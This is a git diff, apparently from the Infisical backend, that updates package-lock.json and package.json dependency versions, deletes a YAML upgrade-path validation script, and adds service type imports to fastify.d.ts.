"sha512-RkT/YXYBTSULo3+af8Ib0ykH8u2MBh57o7q/DAs3lTJlyVQkgQvlrPTnjIzzRPQyavxtPtfg0EopvDyIt0j1rA==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + 
"node_modules/vite/node_modules/@esbuild/linux-arm64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.27.7.tgz", + "integrity": "sha512-RZPHBoxXuNnPQO9rvjh5jdkRmVizktkT7TCDkDmQ0W2SwHInKCAV95GRuvdSvA7w4VMwfCjUiPwDi0ZO6Nfe9A==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/linux-ia32": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.27.7.tgz", + "integrity": "sha512-GA48aKNkyQDbd3KtkplYWT102C5sn/EZTY4XROkxONgruHPU72l+gW+FfF8tf2cFjeHaRbWpOYa/uRBz/Xq1Pg==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/linux-loong64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.27.7.tgz", + "integrity": "sha512-a4POruNM2oWsD4WKvBSEKGIiWQF8fZOAsycHOt6JBpZ+JN2n2JH9WAv56SOyu9X5IqAjqSIPTaJkqN8F7XOQ5Q==", + "cpu": [ + "loong64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/linux-mips64el": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.27.7.tgz", + "integrity": "sha512-KabT5I6StirGfIz0FMgl1I+R1H73Gp0ofL9A3nG3i/cYFJzKHhouBV5VWK1CSgKvVaG4q1RNpCTR2LuTVB3fIw==", + "cpu": [ + "mips64el" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/linux-ppc64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.27.7.tgz", + "integrity": 
"sha512-gRsL4x6wsGHGRqhtI+ifpN/vpOFTQtnbsupUF5R5YTAg+y/lKelYR1hXbnBdzDjGbMYjVJLJTd2OFmMewAgwlQ==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/linux-riscv64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.27.7.tgz", + "integrity": "sha512-hL25LbxO1QOngGzu2U5xeXtxXcW+/GvMN3ejANqXkxZ/opySAZMrc+9LY/WyjAan41unrR3YrmtTsUpwT66InQ==", + "cpu": [ + "riscv64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/linux-s390x": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.27.7.tgz", + "integrity": "sha512-2k8go8Ycu1Kb46vEelhu1vqEP+UeRVj2zY1pSuPdgvbd5ykAw82Lrro28vXUrRmzEsUV0NzCf54yARIK8r0fdw==", + "cpu": [ + "s390x" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/linux-x64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.27.7.tgz", + "integrity": "sha512-hzznmADPt+OmsYzw1EE33ccA+HPdIqiCRq7cQeL1Jlq2gb1+OyWBkMCrYGBJ+sxVzve2ZJEVeePbLM2iEIZSxA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/netbsd-arm64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-arm64/-/netbsd-arm64-0.27.7.tgz", + "integrity": "sha512-b6pqtrQdigZBwZxAn1UpazEisvwaIDvdbMbmrly7cDTMFnw/+3lVxxCTGOrkPVnsYIosJJXAsILG9XcQS+Yu6w==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], + "engines": { + "node": ">=18" + } + }, + 
"node_modules/vite/node_modules/@esbuild/netbsd-x64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.27.7.tgz", + "integrity": "sha512-OfatkLojr6U+WN5EDYuoQhtM+1xco+/6FSzJJnuWiUw5eVcicbyK3dq5EeV/QHT1uy6GoDhGbFpprUiHUYggrw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/openbsd-arm64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-arm64/-/openbsd-arm64-0.27.7.tgz", + "integrity": "sha512-AFuojMQTxAz75Fo8idVcqoQWEHIXFRbOc1TrVcFSgCZtQfSdc1RXgB3tjOn/krRHENUB4j00bfGjyl2mJrU37A==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/openbsd-x64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.27.7.tgz", + "integrity": "sha512-+A1NJmfM8WNDv5CLVQYJ5PshuRm/4cI6WMZRg1by1GwPIQPCTs1GLEUHwiiQGT5zDdyLiRM/l1G0Pv54gvtKIg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/openharmony-arm64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/openharmony-arm64/-/openharmony-arm64-0.27.7.tgz", + "integrity": "sha512-+KrvYb/C8zA9CU/g0sR6w2RBw7IGc5J2BPnc3dYc5VJxHCSF1yNMxTV5LQ7GuKteQXZtspjFbiuW5/dOj7H4Yw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openharmony" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/sunos-x64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.27.7.tgz", + "integrity": 
"sha512-ikktIhFBzQNt/QDyOL580ti9+5mL/YZeUPKU2ivGtGjdTYoqz6jObj6nOMfhASpS4GU4Q/Clh1QtxWAvcYKamA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "sunos" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/win32-arm64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.27.7.tgz", + "integrity": "sha512-7yRhbHvPqSpRUV7Q20VuDwbjW5kIMwTHpptuUzV+AA46kiPze5Z7qgt6CLCK3pWFrHeNfDd1VKgyP4O+ng17CA==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/win32-ia32": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.27.7.tgz", + "integrity": "sha512-SmwKXe6VHIyZYbBLJrhOoCJRB/Z1tckzmgTLfFYOfpMAx63BJEaL9ExI8x7v0oAO3Zh6D/Oi1gVxEYr5oUCFhw==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/win32-x64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.27.7.tgz", + "integrity": "sha512-56hiAJPhwQ1R4i+21FVF7V8kSD5zZTdHcVuRFMW0hn753vVfQN8xlx4uOPT4xoGH0Z/oVATuR82AiqSTDIpaHg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/esbuild": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.27.7.tgz", + "integrity": "sha512-IxpibTjyVnmrIQo5aqNpCgoACA/dTKLTlhMHihVHhdkxKyPO1uBBthumT0rdHmcsk9uMonIWS0m4FljWzILh3w==", + "dev": true, + "hasInstallScript": true, + "license": "MIT", + "bin": { + "esbuild": "bin/esbuild" + }, + "engines": { + "node": ">=18" + }, + "optionalDependencies": { + "@esbuild/aix-ppc64": "0.27.7", + 
"@esbuild/android-arm": "0.27.7", + "@esbuild/android-arm64": "0.27.7", + "@esbuild/android-x64": "0.27.7", + "@esbuild/darwin-arm64": "0.27.7", + "@esbuild/darwin-x64": "0.27.7", + "@esbuild/freebsd-arm64": "0.27.7", + "@esbuild/freebsd-x64": "0.27.7", + "@esbuild/linux-arm": "0.27.7", + "@esbuild/linux-arm64": "0.27.7", + "@esbuild/linux-ia32": "0.27.7", + "@esbuild/linux-loong64": "0.27.7", + "@esbuild/linux-mips64el": "0.27.7", + "@esbuild/linux-ppc64": "0.27.7", + "@esbuild/linux-riscv64": "0.27.7", + "@esbuild/linux-s390x": "0.27.7", + "@esbuild/linux-x64": "0.27.7", + "@esbuild/netbsd-arm64": "0.27.7", + "@esbuild/netbsd-x64": "0.27.7", + "@esbuild/openbsd-arm64": "0.27.7", + "@esbuild/openbsd-x64": "0.27.7", + "@esbuild/openharmony-arm64": "0.27.7", + "@esbuild/sunos-x64": "0.27.7", + "@esbuild/win32-arm64": "0.27.7", + "@esbuild/win32-ia32": "0.27.7", + "@esbuild/win32-x64": "0.27.7" + } + }, + "node_modules/vite/node_modules/picomatch": { + "version": "4.0.4", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz", + "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" + } + }, + "node_modules/vitest": { + "version": "3.2.4", + "resolved": "https://registry.npmjs.org/vitest/-/vitest-3.2.4.tgz", + "integrity": "sha512-LUCP5ev3GURDysTWiP47wRRUpLKMOfPh+yKTx3kVIEiu5KOMeqzpnYNsKyOoVrULivR8tLcks4+lga33Whn90A==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/chai": "^5.2.2", + "@vitest/expect": "3.2.4", + "@vitest/mocker": "3.2.4", + "@vitest/pretty-format": "^3.2.4", + "@vitest/runner": "3.2.4", + "@vitest/snapshot": "3.2.4", + "@vitest/spy": "3.2.4", + "@vitest/utils": "3.2.4", + "chai": "^5.2.0", + "debug": "^4.4.1", + "expect-type": "^1.2.1", + "magic-string": "^0.30.17", + "pathe": "^2.0.3", + "picomatch": "^4.0.2", + 
"std-env": "^3.9.0", + "tinybench": "^2.9.0", + "tinyexec": "^0.3.2", + "tinyglobby": "^0.2.14", + "tinypool": "^1.1.1", + "tinyrainbow": "^2.0.0", + "vite": "^5.0.0 || ^6.0.0 || ^7.0.0-0", + "vite-node": "3.2.4", + "why-is-node-running": "^2.3.0" + }, + "bin": { + "vitest": "vitest.mjs" + }, + "engines": { + "node": "^18.0.0 || ^20.0.0 || >=22.0.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + }, + "peerDependencies": { + "@edge-runtime/vm": "*", + "@types/debug": "^4.1.12", + "@types/node": "^18.0.0 || ^20.0.0 || >=22.0.0", + "@vitest/browser": "3.2.4", + "@vitest/ui": "3.2.4", + "happy-dom": "*", + "jsdom": "*" + }, + "peerDependenciesMeta": { + "@edge-runtime/vm": { "optional": true }, - "sugarss": { + "@types/debug": { "optional": true }, - "terser": { + "@types/node": { "optional": true }, - "tsx": { + "@vitest/browser": { "optional": true }, - "yaml": { + "@vitest/ui": { + "optional": true + }, + "happy-dom": { + "optional": true + }, + "jsdom": { + "optional": true + } + } + }, + "node_modules/vitest/node_modules/@vitest/mocker": { + "version": "3.2.4", + "resolved": "https://registry.npmjs.org/@vitest/mocker/-/mocker-3.2.4.tgz", + "integrity": "sha512-46ryTE9RZO/rfDd7pEqFl7etuyzekzEhUbTW3BvmeO/BcCMEgq59BKhek3dXDWgAj4oMK6OZi+vRr1wPW6qjEQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@vitest/spy": "3.2.4", + "estree-walker": "^3.0.3", + "magic-string": "^0.30.17" + }, + "funding": { + "url": "https://opencollective.com/vitest" + }, + "peerDependencies": { + "msw": "^2.4.9", + "vite": "^5.0.0 || ^6.0.0 || ^7.0.0-0" + }, + "peerDependenciesMeta": { + "msw": { + "optional": true + }, + "vite": { + "optional": true + } + } + }, + "node_modules/vitest/node_modules/debug": { + "version": "4.4.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz", + "integrity": "sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==", + "dev": true, + "license": "MIT", + "dependencies": 
{ + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { "optional": true } } }, + "node_modules/vitest/node_modules/picomatch": { + "version": "4.0.4", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz", + "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" + } + }, "node_modules/w3c-xmlserializer": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/w3c-xmlserializer/-/w3c-xmlserializer-5.0.0.tgz", @@ -27418,6 +27492,15 @@ "node": ">=16" } }, + "node_modules/xml-crypto/node_modules/@xmldom/xmldom": { + "version": "0.8.12", + "resolved": "https://registry.npmjs.org/@xmldom/xmldom/-/xmldom-0.8.12.tgz", + "integrity": "sha512-9k/gHF6n/pAi/9tqr3m3aqkuiNosYTurLLUtc7xQ9sxB/wm7WPygCv8GYa6mS0fLJEHhqMC1ATYhz++U/lRHqg==", + "license": "MIT", + "engines": { + "node": ">=10.0.0" + } + }, "node_modules/xml-crypto/node_modules/xpath": { "version": "0.0.33", "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.33.tgz", @@ -27438,6 +27521,15 @@ "xpath": "0.0.32" } }, + "node_modules/xml-encryption/node_modules/@xmldom/xmldom": { + "version": "0.8.12", + "resolved": "https://registry.npmjs.org/@xmldom/xmldom/-/xmldom-0.8.12.tgz", + "integrity": "sha512-9k/gHF6n/pAi/9tqr3m3aqkuiNosYTurLLUtc7xQ9sxB/wm7WPygCv8GYa6mS0fLJEHhqMC1ATYhz++U/lRHqg==", + "license": "MIT", + "engines": { + "node": ">=10.0.0" + } + }, "node_modules/xml-encryption/node_modules/xpath": { "version": "0.0.32", "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.32.tgz", @@ -27510,6 +27602,7 @@ "version": "5.0.8", "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", + "license": "ISC", "engines": { 
"node": ">=10" } @@ -27534,6 +27627,74 @@ "url": "https://github.com/sponsors/eemeli" } }, + "node_modules/yargs": { + "version": "17.7.2", + "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", + "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", + "license": "MIT", + "dependencies": { + "cliui": "^8.0.1", + "escalade": "^3.1.1", + "get-caller-file": "^2.0.5", + "require-directory": "^2.1.1", + "string-width": "^4.2.3", + "y18n": "^5.0.5", + "yargs-parser": "^21.1.1" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/yargs-parser": { + "version": "21.1.1", + "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", + "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", + "license": "ISC", + "engines": { + "node": ">=12" + } + }, + "node_modules/yargs/node_modules/ansi-regex": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", + "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "license": "MIT", + "engines": { + "node": ">=8" + } + }, + "node_modules/yargs/node_modules/emoji-regex": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", + "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", + "license": "MIT" + }, + "node_modules/yargs/node_modules/string-width": { + "version": "4.2.3", + "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", + "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "license": "MIT", + "dependencies": { + "emoji-regex": "^8.0.0", + "is-fullwidth-code-point": "^3.0.0", + "strip-ansi": "^6.0.1" + }, + "engines": { + "node": ">=8" + } + }, + 
"node_modules/yargs/node_modules/strip-ansi": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", + "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "license": "MIT", + "dependencies": { + "ansi-regex": "^5.0.1" + }, + "engines": { + "node": ">=8" + } + }, "node_modules/yn": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/yn/-/yn-3.1.1.tgz", diff --git a/backend/package.json b/backend/package.json index 505dc173e81..2ffc2095d7a 100644 --- a/backend/package.json +++ b/backend/package.json @@ -62,7 +62,7 @@ "cipher-base": "1.0.5", "sha.js": "2.4.12", "jws": "^4.0.1", - "qs": "^6.14.1", + "qs": "^6.14.2", "glob": "^10.5.0", "cross-spawn": "^7.0.6", "validator": "^13.15.22", @@ -71,7 +71,15 @@ }, "ts-node": { "diff": "^4.0.4" - } + }, + "hono": "^4.12.12", + "@hono/node-server": "^1.19.13", + "vite": "^7.3.2", + "@xmldom/xmldom": "^0.8.12", + "lodash": "^4.18.0", + "tar": "^7.5.11", + "flatted": "^3.4.2", + "@octokit/request-error": "^5.1.1" }, "devDependencies": { "@babel/cli": "^7.18.10", @@ -83,8 +91,6 @@ "@smithy/types": "^4.3.1", "@types/bcrypt": "^5.0.2", "@types/dns-packet": "^5.6.5", - "@types/jmespath": "^0.15.2", - "@types/js-yaml": "^4.0.9", "@types/jsonwebtoken": "^9.0.5", "@types/jsrp": "^0.2.6", "@types/libsodium-wrappers": "^0.7.13", @@ -117,11 +123,9 @@ "eslint-plugin-simple-import-sort": "^10.0.0", "nock": "^14.0.10", "nodemon": "^3.0.2", - "ora": "^7.0.1", "pino-pretty": "^10.2.3", "prompt-sync": "^4.2.0", "react-email": "^5.0.6", - "rimraf": "^5.0.5", "ts-node": "^10.9.2", "tsc-alias": "^1.8.8", "tsconfig-paths": "^4.2.0", @@ -132,12 +136,15 @@ }, "dependencies": { "@ai-sdk/anthropic": "^3.0.68", + "@aws-sdk/client-acm": "^3.1030.0", "@aws-sdk/client-acm-pca": "^3.992.0", + "@aws-sdk/client-elastic-load-balancing-v2": "^3.1015.0", "@aws-sdk/client-elasticache": "^3.637.0", "@aws-sdk/client-iam": "^3.525.0", 
"@aws-sdk/client-kms": "^3.609.0", "@aws-sdk/client-route-53": "^3.810.0", "@aws-sdk/client-secrets-manager": "^3.504.0", + "@aws-sdk/client-ssm": "^3.1015.0", "@aws-sdk/client-sts": "^3.600.0", "@casl/ability": "^6.5.0", "@clickhouse/client": "^1.17.0", @@ -158,7 +165,7 @@ "@fastify/swagger-ui": "^3.1.0", "@fastify/websocket": "^10.0.1", "@gitbeaker/rest": "^42.5.0", - "@google-cloud/kms": "^4.5.0", + "@google-cloud/kms": "^5.4.0", "@infisical/ldapjs": "3.0.11", "@infisical/pg-view-generator": "^1.1.0", "@infisical/quic": "^1.0.8", @@ -168,7 +175,6 @@ "@octokit/core": "^5.2.1", "@octokit/plugin-paginate-graphql": "^4.0.1", "@octokit/plugin-retry": "^5.0.5", - "@octokit/request": "8.4.1", "@octokit/rest": "^20.0.2", "@octokit/webhooks-types": "^7.3.1", "@octopusdeploy/api-client": "^3.4.1", @@ -180,12 +186,9 @@ "@opentelemetry/resources": "^1.28.0", "@opentelemetry/sdk-metrics": "^1.28.0", "@opentelemetry/semantic-conventions": "^1.27.0", - "@peculiar/asn1-cms": "^2.6.1", - "@peculiar/asn1-pkcs9": "^2.6.1", "@peculiar/asn1-schema": "^2.3.8", "@peculiar/x509": "^1.12.1", "@react-email/components": "^1.0.1", - "@serdnam/pino-cloudwatch-transport": "^1.0.4", "@simplewebauthn/server": "^13.2.2", "@sindresorhus/slugify": "1.1.0", "@slack/oauth": "^3.0.2", @@ -194,11 +197,9 @@ "@ucast/mongo2js": "^1.3.4", "acme-client": "^5.4.0", "ai": "^6.0.154", - "ajv": "^8.12.0", "argon2": "^0.31.2", "asn1js": "^3.0.6", - "aws-sdk": "^2.1553.0", - "axios": "^1.12.0", + "axios": "^1.15.0", "axios-ntlm": "^1.4.4", "axios-retry": "^4.0.0", "bcrypt": "^5.1.1", @@ -218,9 +219,7 @@ "hdb": "^0.19.10", "ioredis": "^5.3.2", "isomorphic-dompurify": "^2.22.0", - "jmespath": "^0.16.0", "jose": "^6.1.0", - "js-yaml": "^4.1.0", "jsonwebtoken": "^9.0.2", "jsrp": "^0.2.4", "jwks-rsa": "^3.1.0", @@ -236,7 +235,7 @@ "nanoid": "^3.3.8", "netmask": "^2.0.2", "node-forge": "^1.3.2", - "nodemailer": "^7.0.12", + "nodemailer": "^8.0.5", "oci-common": "^2.108.0", "oci-identity": "^2.108.0", 
"oci-keymanagement": "^2.108.0", diff --git a/backend/scripts/validate-upgrade-path-file.ts b/backend/scripts/validate-upgrade-path-file.ts deleted file mode 100644 index 566300cdebf..00000000000 --- a/backend/scripts/validate-upgrade-path-file.ts +++ /dev/null @@ -1,107 +0,0 @@ -/* eslint-disable no-console */ -import { readFile } from "fs/promises"; -import * as yaml from "js-yaml"; -import * as path from "path"; -import { z } from "zod"; - -import { upgradePathConfigSchema } from "../src/services/upgrade-path/upgrade-path-schemas"; - -async function validateUpgradePathConfig(): Promise { - try { - const yamlPath = path.join(__dirname, "..", "upgrade-path.yaml"); - const resolvedPath = path.resolve(yamlPath); - const expectedBaseDir = path.resolve(__dirname, ".."); - - if (!resolvedPath.startsWith(expectedBaseDir)) { - throw new Error("Invalid configuration file path"); - } - - try { - await readFile(yamlPath, "utf8"); - } catch (error) { - if (error instanceof Error && "code" in error && error.code === "ENOENT") { - console.log("Warning: No upgrade-path.yaml file found"); - return; - } - throw error; - } - - const yamlContent = await readFile(yamlPath, "utf8"); - - if (yamlContent.length > 1024 * 1024) { - throw new Error("Config file too large (>1MB)"); - } - - let config: unknown; - try { - config = yaml.load(yamlContent, { - schema: yaml.FAILSAFE_SCHEMA, - filename: yamlPath, - onWarning: (warning) => { - console.log(`YAML Warning: ${warning.message}`); - } - }); - } catch (yamlError) { - if (yamlError instanceof yaml.YAMLException) { - throw new Error( - `YAML parsing failed: ${yamlError.message} at line ${yamlError.mark?.line}, column ${yamlError.mark?.column}` - ); - } - throw new Error(`YAML parsing failed: ${yamlError instanceof Error ? 
yamlError.message : "Unknown YAML error"}`); - } - - if (!config) { - console.log("Warning: Empty configuration file"); - return; - } - - if (typeof config !== "object" || config === null) { - throw new Error("Configuration must be a valid YAML object"); - } - - const result = upgradePathConfigSchema.safeParse(config); - - if (!result.success) { - console.log("Validation failed with the following errors:"); - result.error.issues.forEach((issue: z.ZodIssue) => { - const issuePath = issue.path.length > 0 ? `[${issue.path.join(".")}]` : ""; - console.log(` - ${issuePath}: ${issue.message}`); - }); - throw new Error("Schema validation failed"); - } - - const validatedConfig = result.data; - const versions = validatedConfig?.versions || {}; - const versionCount = Object.keys(versions).length; - - if (versionCount === 0) { - console.log("Warning: No versions found in the configuration"); - } else { - console.log(`Validated ${versionCount} version configuration(s)`); - - const commonPatterns = [ - /^v?\d+\.\d+\.\d+$/, - /^v?\d+\.\d+\.\d+\.\d+$/, - /^infisical\/v?\d+\.\d+\.\d+$/, - /^infisical\/v?\d+\.\d+\.\d+-\w+$/ - ]; - - for (const versionKey of Object.keys(versions)) { - const isCommonPattern = commonPatterns.some((pattern) => pattern.test(versionKey)); - if (!isCommonPattern) { - console.log(`Warning: Version key '${versionKey}' doesn't match common patterns. This may be intentional.`); - } - } - } - - console.log("upgrade-path.yaml format is valid"); - } catch (error) { - console.error(`Validation failed: ${error instanceof Error ? 
error.message : "Unknown error"}`); - process.exit(1); - } -} - -validateUpgradePathConfig().catch((error) => { - console.error("Unexpected error:", error); - process.exit(1); -}); diff --git a/backend/src/@types/fastify.d.ts b/backend/src/@types/fastify.d.ts index 3a85c1f93f1..81a5972858f 100644 --- a/backend/src/@types/fastify.d.ts +++ b/backend/src/@types/fastify.d.ts @@ -19,10 +19,12 @@ import { TEmailDomainServiceFactory } from "@app/ee/services/email-domain/email- import { TEventBusService as TInternalEventBusService } from "@app/ee/services/event-bus"; import { TExternalKmsServiceFactory } from "@app/ee/services/external-kms/external-kms-service"; import { TGatewayServiceFactory } from "@app/ee/services/gateway/gateway-service"; +import { TGatewayPoolServiceFactory } from "@app/ee/services/gateway-pool/gateway-pool-service"; import { TGatewayV2ServiceFactory } from "@app/ee/services/gateway-v2/gateway-v2-service"; import { TGithubOrgSyncServiceFactory } from "@app/ee/services/github-org-sync/github-org-sync-service"; import { TGroupServiceFactory } from "@app/ee/services/group/group-service"; import { TIdentityAuthTemplateServiceFactory } from "@app/ee/services/identity-auth-template"; +import { TInsightsServiceFactory } from "@app/ee/services/insights/insights-service"; import { TKmipClientDALFactory } from "@app/ee/services/kmip/kmip-client-dal"; import { TKmipOperationServiceFactory } from "@app/ee/services/kmip/kmip-operation-service"; import { TKmipServiceFactory } from "@app/ee/services/kmip/kmip-service"; @@ -32,6 +34,7 @@ import { TOidcConfigServiceFactory } from "@app/ee/services/oidc/oidc-config-ser import { TPamAccountServiceFactory } from "@app/ee/services/pam-account/pam-account-service"; import { TPamAccountPolicyServiceFactory } from "@app/ee/services/pam-account-policy/pam-account-policy-service"; import { TPamDiscoverySourceServiceFactory } from "@app/ee/services/pam-discovery/pam-discovery-source-service"; +import { TPamDomainServiceFactory 
} from "@app/ee/services/pam-domain/pam-domain-service"; import { TPamFolderServiceFactory } from "@app/ee/services/pam-folder/pam-folder-service"; import { TPamResourceRotationRulesServiceFactory } from "@app/ee/services/pam-resource/pam-resource-rotation-rules-service"; import { TPamResourceServiceFactory } from "@app/ee/services/pam-resource/pam-resource-service"; @@ -52,7 +55,6 @@ import { TSamlConfigServiceFactory } from "@app/ee/services/saml-config/saml-con import { TScimServiceFactory } from "@app/ee/services/scim/scim-types"; import { TSecretApprovalPolicyServiceFactory } from "@app/ee/services/secret-approval-policy/secret-approval-policy-service"; import { TSecretApprovalRequestServiceFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-service"; -import { TSecretRotationServiceFactory } from "@app/ee/services/secret-rotation/secret-rotation-service"; import { TSecretRotationV2ServiceFactory } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-service"; import { TSecretScanningServiceFactory } from "@app/ee/services/secret-scanning/secret-scanning-service"; import { TSecretScanningV2ServiceFactory } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-service"; @@ -67,14 +69,13 @@ import { RequestMemoizer } from "@app/lib/request-context/request-memoizer"; import { 